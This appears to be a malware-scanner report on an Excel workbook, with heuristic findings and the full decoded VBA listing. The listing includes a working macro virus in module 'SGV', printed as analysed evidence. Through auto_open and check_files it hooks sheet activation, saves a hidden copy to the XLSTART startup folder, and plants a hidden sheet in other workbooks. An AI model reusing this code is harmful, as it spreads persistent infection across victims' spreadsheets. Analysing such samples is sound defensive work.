MALICIOUS
116
Risk Score
Heuristics 5
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA copies the workbook into the Excel XLSTART startup folder — high — OLE_VBA_XLSTART_PERSISTENCE: The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour. Matched line in script:
ChDir Application.StartupPath -
VBA infects other workbooks via an OnSheetActivate copy hook — high — OLE_VBA_WORKBOOK_INFECTION_SPREADER: The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens. Matched line in script:
Application.OnSheetActivate = "check_files" -
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Private Sub Workbook_Open() -
Auto_Open macro — low — OLE_VBA_AUTO: Auto_Open macro. Matched line in script:
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9521 bytes |

SHA-256: 82188ebf8968546c1997b9605100308f28d690180a6837e8626981cb77de7bd2
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Run-once flag for Workbook_SheetCalculate: that handler sets it to True the
' first time it processes sheet "THDT". Nothing in this listing sets it back
' to False.
Public bflag As Boolean
Private Sub Workbook_Open()
    ' Runs when the workbook is opened. The only action is to switch the active
    ' workbook to "precision as displayed" calculation. This handler does not
    ' touch the startup folder or Application.OnSheetActivate; the persistence
    ' and replication logic sits in module "SGV" (auto_open / check_files).
    With ActiveWorkbook
        .PrecisionAsDisplayed = True
    End With
End Sub
' Fires after any sheet in the workbook recalculates. For sheet "THDT" it
' finds the first cell in a configured column that holds an error value,
' overwrites it with 0, then writes the cell's original formula back.
' NOTE(review): presumably a workaround that forces an error cell to be
' recalculated - confirm with the workbook's author.
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)
' Every runtime error below is skipped silently, including a missing custom
' document property or an invalid cell reference.
On Error Resume Next
' bflag limits this body to a single run: it is set here and never cleared in
' the visible listing.
If Sh.Name = "THDT" And bflag = False Then
bflag = True
Dim intFirstRow%, intLastRow%, intCol%
' The row range and the column to scan come from custom document properties
' stored in the workbook.
With ActiveWorkbook
intFirstRow = .CustomDocumentProperties("FirstRow")
intLastRow = .CustomDocumentProperties("LastRow")
intCol = .CustomDocumentProperties("Col")
End With
Dim i%, intRow%, strFormu$
For i = intFirstRow To intLastRow
' Stop at the first cell whose value is an error.
If IsError(Sh.Cells(i, intCol).Value) = True Then
strFormu = Sh.Cells(i, intCol).Formula
Sh.Cells(i, intCol).Value = 0
intRow = i
Exit For
End If
Next
' Restore the saved formula. If no error cell was found, intRow is still 0 and
' strFormu is empty, so this assignment targets an invalid cell; the resulting
' error is swallowed by On Error Resume Next.
Sh.Cells(intRow, intCol).Formula = strFormu
End If
End Sub
Attribute VB_Name = "SGV"
' Auto-run entry point of module "SGV": Excel runs a procedure named auto_open
' when the workbook is opened. It registers check_files as the application-wide
' OnSheetActivate handler, so check_files then runs on every sheet activation
' in this Excel session, not only inside this workbook.
' Triage note: this assignment is the line matched by the report's
' OLE_VBA_WORKBOOK_INFECTION_SPREADER finding.
Sub auto_open()
' Procedure attribute as it appears in the exported module source.
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "check_files"
End Sub
' OnSheetActivate handler that implements both stages flagged by the report:
'   - persistence: saving a workbook named SGV.XLS into Application.StartupPath
'     (the Excel XLSTART folder), and
'   - replication: copying the sheet "SGV" into the workbook being activated.
' Indicators visible in this code: a file SGV.XLS in the Excel startup folder,
' and a hidden sheet named "SGV" placed first in a workbook.
Sub check_files()
' Procedure attribute as it appears in the exported module source.
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
' p = 1 when SGV.XLS already exists in the startup folder.
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "SGV.XLS")
If m$ = "SGV.XLS" Then p = 1 Else p = 0
' w = 1 when the active workbook already contains at least one module sheet.
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
' Encodes both flags in one number: 0, 1, 10 or 11. Only 1 and 10 are handled.
whichfile = p + w * 10
Select Case whichfile
' Case 10: the startup copy is missing and the active workbook has modules.
' This is the persistence path.
Case 10
' Screen updating is switched off, so the steps below are not drawn on screen.
Application.ScreenUpdating = False
N4$ = ActiveWorkbook.Name
Sheets("SGV").Visible = True
Sheets("SGV").Select
' Copy is called without a destination; the code that follows treats the
' result as a new active workbook holding the copied sheet.
Sheets("SGV").Copy
' Blank the document properties of the new workbook before it is saved.
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.Name
' Remember the current directory so it can be restored after the save.
c4$ = CurDir()
ChDir Application.StartupPath
' The window of the new workbook is hidden before it is saved.
ActiveWindow.Visible = False
' Write the copy into the startup folder as SGV.XLS. The path is built with
' "/" here, while the existence check above uses "\".
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "SGV.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
' Hide the SGV sheet in the originating workbook again.
Workbooks(N4$).Sheets("SGV").Visible = False
' Re-point the handler at the copy saved in the startup folder.
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "SGV.XLS!check_files"
' Case 1: the startup copy exists and the active workbook has no modules.
' This is the replication path.
Case 1
Application.ScreenUpdating = False
N4$ = ActiveWorkbook.Name
' p4$ is assigned but not used anywhere in the visible code.
p4$ = ActiveWorkbook.Path
' Only the first sheet's name is checked to decide whether the workbook already
' carries the SGV sheet.
s$ = Workbooks(N4$).Sheets(1).Name
If s$ <> "SGV" Then
' Insert the SGV sheet from the startup copy ahead of the first sheet, then
' hide it.
Workbooks("SGV.XLS").Sheets("SGV").Copy before:=Workbooks(N4$).Sheets(1)
Workbooks(N4$).Sheets("SGV").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "SGV.XLS!check_files"
' whichfile = 0 or 11: nothing is done.
Case Else
End Select
End Sub
Attribute VB_Name = "Module1"
Option Explicit
' Locale constants intended for the GetLocaleInfo API call declared below.
' That declaration is commented out, and neither constant is referenced
' anywhere in the visible listing.
Public Const LOCALE_USER_DEFAULT = &H400
Private Const LOCALE_SDECIMAL = &HE
'Declare Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
' Module-level path string; CreateReport fills it from the workbook's custom
' document property "Where13".
Dim strXMLPath$
Function Dround(Num As Double, place As Integer) As Double
    ' Round Num to `place` decimal places by scaling, rounding to a whole
    ' number and scaling back. VBA's Round uses round-half-to-even, so exact
    ' halves go to the nearest even digit.
    Dim factor As Double
    factor = 10 ^ place
    Dround = Round(Num * factor) / factor
End Function
Public Function Add_Refs(strPath$)
    ' Add a reference to "Adt2excel.dll" to the active VBA project.
    '   strPath - folder prefix; the file name is appended as-is, so the
    '             caller has to supply any trailing path separator.
    ' Any failure is reported to the user in a message box.
    ' NOTE(review): the library is loaded from whatever folder the caller
    ' passes, so the reference is only as trustworthy as that path.
    Dim libraryFile As String
    On Error GoTo report_failure
    libraryFile = strPath & "Adt2excel.dll"
    Application.VBE.ActiveVBProject.References.AddFromFile libraryFile
    Exit Function
report_failure:
    MsgBox Err.Number & ": " & Err.Description
End Function
Public Function CreateReport()
    ' Build the report for the active workbook: read the path stored in custom
    ' document property "Where13", open an ADODB connection through
    ' Open_Connection, pass both to DuToanDGCT_MainInfo, then release the
    ' connection and remove the temporary project reference via Del_Refs.
    ' Open_Connection and DuToanDGCT_MainInfo are not defined in this listing.
    ' On failure only the error message is shown; the clean-up steps after the
    ' failing call are not reached.
    On Error GoTo report_failure
    Dim cConnect As New ADODB.Connection
    strXMLPath = ActiveWorkbook.CustomDocumentProperties("Where13")
    Open_Connection ActiveWorkbook, cConnect
    DuToanDGCT_MainInfo ActiveWorkbook, cConnect, strXMLPath
    Set cConnect = Nothing
    Del_Refs
    Exit Function
report_failure:
    MsgBox Err.Number & ": " & Err.Description
End Function
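Public Function Del_Refs()
    ' Remove the "Adt2Excel" reference from the active VBA project.
    ' Side effect: also sets the application's default save format to 56.
    ' Errors are ignored on purpose (best-effort clean-up), for example when
    ' access to the VBA project object model is not available.
    On Error Resume Next
    Dim i%
    Application.DefaultSaveFormat = 56 '=xlExcel8
    With Application.VBE.ActiveVBProject
        ' Walk the collection backwards: removing an item shifts the indexes of
        ' the items after it, so a forward loop runs past the end once a
        ' reference has been removed and relies on the error being swallowed.
        For i = .References.Count To 1 Step -1
            If .References(i).Name = "Adt2Excel" Then .References.Remove .References(i)
        Next
    End With
End Function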
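Public Function bangchu(so As Double, donvi As String, Optional ptdv As String) As String
    ' Spell out the integer part of `so` in words, followed by the unit text.
    '   so    - amount to spell out; it is no longer modified (see below).
    '   donvi - unit text appended after the words.
    '   ptdv  - accepted for compatibility; not used in this function.
    ' Returns "" when so is 0. Returns the text in Data!E1 when no words were
    ' produced, which happens when the magnitude is 1E+15 or more, or when the
    ' value is positive and smaller than 1. Otherwise returns the words with
    ' the first letter upper-cased. Negative values are prefixed with the text
    ' in Data!E2.
    Dim amount As Double

    bangchu = ""
    ' A Double can never hold Null, so the former "Or so = Null" test had no
    ' effect and is dropped.
    If so = 0 Then Exit Function

    ' Work on a local copy: `so` is passed ByRef, and negating it in place
    ' changed the caller's variable for negative amounts.
    amount = so
    If amount < 0 Then
        bangchu = Sheets("Data").Cells(2, 5) & " " ' "am"
        amount = -amount
    End If

    If amount < 1E+15 Then
        If Int(amount) <> 0 Then
            bangchu = bangchu & viet(amount) & " " & donvi
        End If
    End If

    bangchu = Trim(bangchu)
    If bangchu <> "" Then
        ' Upper-case the first character and keep the rest unchanged.
        bangchu = UCase(Left(bangchu, 1)) & Mid(bangchu, 2)
    Else
        bangchu = Sheets("Data").Cells(1, 5) '"solon")
    End If
End Function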
' Spell out the integer part of `so` in words, using lookup tables stored on
' sheet "Data":
'   column A, rows 1-10 : word for each digit 0-9          (chu)
'   column B, rows 1-17 : word for each place value        (hang)
'   column C, rows 1-12 : phrases to be corrected          (sosai)
'   column D, rows 1-12 : replacement for each such phrase (thaythe)
' Returns "" when the integer part is 0, and the text in Data!E1 when so is
' 1E+15 or more.
Function viet(so As Double) As String
Dim chu As Variant, hang As Variant, sosai As Variant, thaythe As Variant
' s2 and x are declared but never used in this function.
Dim s1 As String, s2 As String, x As Long, i As Integer
If so < 1E+15 Then
ReDim chu(9)
For i = 0 To 9
chu(i) = Sheets("Data").Cells(i + 1, 1)
Next
ReDim hang(16)
For i = 0 To 16
hang(i) = Sheets("Data").Cells(i + 1, 2)
Next
ReDim sosai(11)
For i = 0 To 11
sosai(i) = Sheets("Data").Cells(i + 1, 3)
Next
ReDim thaythe(11)
For i = 0 To 11
thaythe(i) = Sheets("Data").Cells(i + 1, 4)
Next
' Decimal digits of the integer part, without the leading space Str adds.
s1 = Trim(Str(Int(so)))
viet = ""
' String-to-number comparison; relies on VBA's implicit conversion.
If s1 = 0 Then Exit Function
' Start with the word for the last digit, then prepend each earlier digit
' together with its place-value word, moving right to left.
viet = chu(Val(Right(s1, 1)))
For i = Len(s1) - 1 To 1 Step -1
viet = chu(Val(Mid(s1, i, 1))) & " " & hang(Len(s1) - i - 1) & " " & viet
Next
viet = Trim(viet)
' Clean-up passes: normalise spacing, then apply each sosai -> thaythe pair.
For i = 0 To 11
' NOTE(review): as displayed, both literals below are a single space, which
' would make the replacement a no-op at best. The first literal was presumably
' two spaces before the page collapsed whitespace - confirm against the
' extracted macros.bas.
viet = thay(viet, " ", " ")
' NOTE(review): an empty cell in column C passes an empty search string to
' thay - check how thay handles that case.
viet = thay(viet, CStr(sosai(i)), CStr(thaythe(i)))
Next
Else
viet = Sheets("Data").Cells(1, 5) '"solon")
End If
End Function
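Function thay(s1 As String, s2 As String, s3 As String) As String
    ' Replace every occurrence of s2 in s1 with s3 and return the result with
    ' leading and trailing spaces removed.
    '   s1 - text to process
    '   s2 - text to search for
    '   s3 - replacement text
    ' The search restarts from the beginning after each replacement, so matches
    ' created by an earlier replacement are replaced as well (this is what
    ' collapses a run of spaces down to one).
    ' Caller constraint: s3 must not contain s2, otherwise every replacement
    ' creates a new match and the loop does not end.
    Dim x As Long
    thay = s1
    ' Guard two inputs that could never finish: an empty search string matches
    ' at position 1 on every pass, and s2 = s3 rewrites the same text forever.
    If Len(s2) > 0 And s2 <> s3 Then
        x = InStr(1, thay, s2)
        While x <> 0
            thay = Left(thay, x - 1) & s3 & Mid(thay, x + Len(s2))
            x = InStr(1, thay, s2)
        Wend
    End If
    thay = Trim(thay)
End Function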
Function TKL(strCell$) ', Optional iRound% = 3)
    ' Evaluate the arithmetic written after the last ":" or "=" in strCell.
    ' In that trailing part "x" is treated as multiplication and "," as the
    ' decimal point. When the text contains neither separator, the whole
    ' string is evaluated unchanged. When the character before the separator
    ' is "<" or ">" (a comparison such as "<="), nothing is evaluated and the
    ' function returns Empty.
    ' NOTE(security): Evaluate runs the text as an Excel expression. The text
    ' comes from cell content, so a workbook from an untrusted source controls
    ' what is evaluated here.
    Dim strExpr$, posColon%, posEquals%, posSplit%
    Dim prevChar As String

    strExpr = strCell
    posColon = InStrRev(strExpr, ":")
    posEquals = InStrRev(strExpr, "=")

    ' Position of whichever separator occurs last; 0 when neither is present.
    If posEquals > posColon Then
        posSplit = posEquals
    Else
        posSplit = posColon
    End If

    If posSplit <> 0 Then
        prevChar = Right(Trim(Left(strExpr, posSplit - 1)), 1)
        If prevChar = "<" Or prevChar = ">" Then Exit Function
        strExpr = Right(strExpr, Len(strExpr) - posSplit)
        strExpr = Replace(strExpr, "x", "*")
        strExpr = Replace(strExpr, ",", ".")
    End If

    TKL = Evaluate(strExpr)
    ' TKL = Round(Evaluate(strExpr), iRound)
End Function
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet12"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet14"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet13"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet19"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet20"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet9"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||